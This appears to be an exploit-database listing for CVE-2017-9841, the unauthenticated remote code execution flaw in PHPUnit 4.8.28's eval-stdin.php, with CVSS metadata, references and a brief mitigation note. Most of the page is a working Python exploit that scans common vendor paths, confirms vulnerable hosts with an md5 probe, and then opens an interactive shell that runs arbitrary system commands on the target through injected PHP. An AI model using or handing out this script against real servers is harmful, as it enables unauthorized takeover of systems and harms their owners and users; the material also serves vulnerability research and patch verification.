PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)

vendor:

PHP Unit

by:

souzo

9.8

CVSS

CRITICAL

Remote Code Execution (RCE)

CWE

Product Name: PHP Unit

Affected Version From: 4.8.28

Affected Version To: 4.8.28

Patch Exists: YES

Related CWE: CVE-2017-9841

CPE: a:phpunit:phpunit:4.8.28

Metasploit: https://www.rapid7.com/db/vulnerabilities/moodle-cve-2017-9841/, https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2017-9841/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2017-9841/

Other Scripts:

Tags: cve,cve2017,php,phpunit,rce,kev

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://github.com/cyberharsh/Php-unit-CVE-2017-9841, https://github.com/RandomRobbieBF/phpunit-brute, https://thephp.cc/articles/phpunit-a-security-risk, https://twitter.com/sec715/status/1411517028012158976, https://nvd.nist.gov/vuln/detail/CVE-2017-9841

Nuclei Metadata: {'max-request': 6, 'vendor': 'phpunit_project', 'product': 'phpunit'}

Platforms Tested: Unit

2022

PHP Unit 4.8.28 – Remote Code Execution (RCE) (Unauthenticated)

A vulnerability in PHP Unit 4.8.28 allows an unauthenticated attacker to execute arbitrary code on the target system. This is due to the presence of a vulnerable file, eval-stdin.php, which can be accessed by sending a specially crafted HTTP request to the target system. The vulnerable file is present in the vendor/phpunit/phpunit/src/Util/PHP/ directory. An attacker can exploit this vulnerability by sending a malicious HTTP request to the target system, which will execute the arbitrary code present in the request.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their systems to the latest version of PHP Unit.

Source

Exploit-DB raw data:

# Exploit Title: PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2022/01/30 
# Exploit Author: souzo 
# Vendor Homepage: phpunit.de
# Version: 4.8.28
# Tested on: Unit
# CVE : CVE-2017-9841

import requests
from sys import argv
phpfiles = ["/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"]

def check_vuln(site):
    vuln = False
    try:
        for i in phpfiles:
            site = site+i
            req = requests.get(site,headers= {
                "Content-Type" : "text/html",
                "User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
            },data="<?php echo md5(phpunit_rce); ?>")
            if "6dd70f16549456495373a337e6708865" in req.text:
                print(f"Vulnerable: {site}")
                return site 
    except:
        return vuln
def help():
    exit(f"{argv[0]} <site>")

def main():
    if len(argv) < 2:
        help()
    if not "http" in argv[1] or not ":" in argv[1] or not "/" in argv[1]:
        help()
    site = argv[1]
    if site.endswith("/"):
        site = list(site)
        site[len(site) -1 ] = ''
        site = ''.join(site)

    pathvuln = check_vuln(site)
    if pathvuln == False:
        exit("Not vuln")
    try:
        while True:
            cmd = input("> ")
            req = requests.get(str(pathvuln),headers={
                "User-Agent" : f"Mozilla/5.0 (X11; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0",
                "Content-Type" : "text/html"
            },data=f'<?php system(\'{cmd}\') ?>')
            print(req.text)
    except Exception as ex:
        exit("Error: " + str(ex))
main()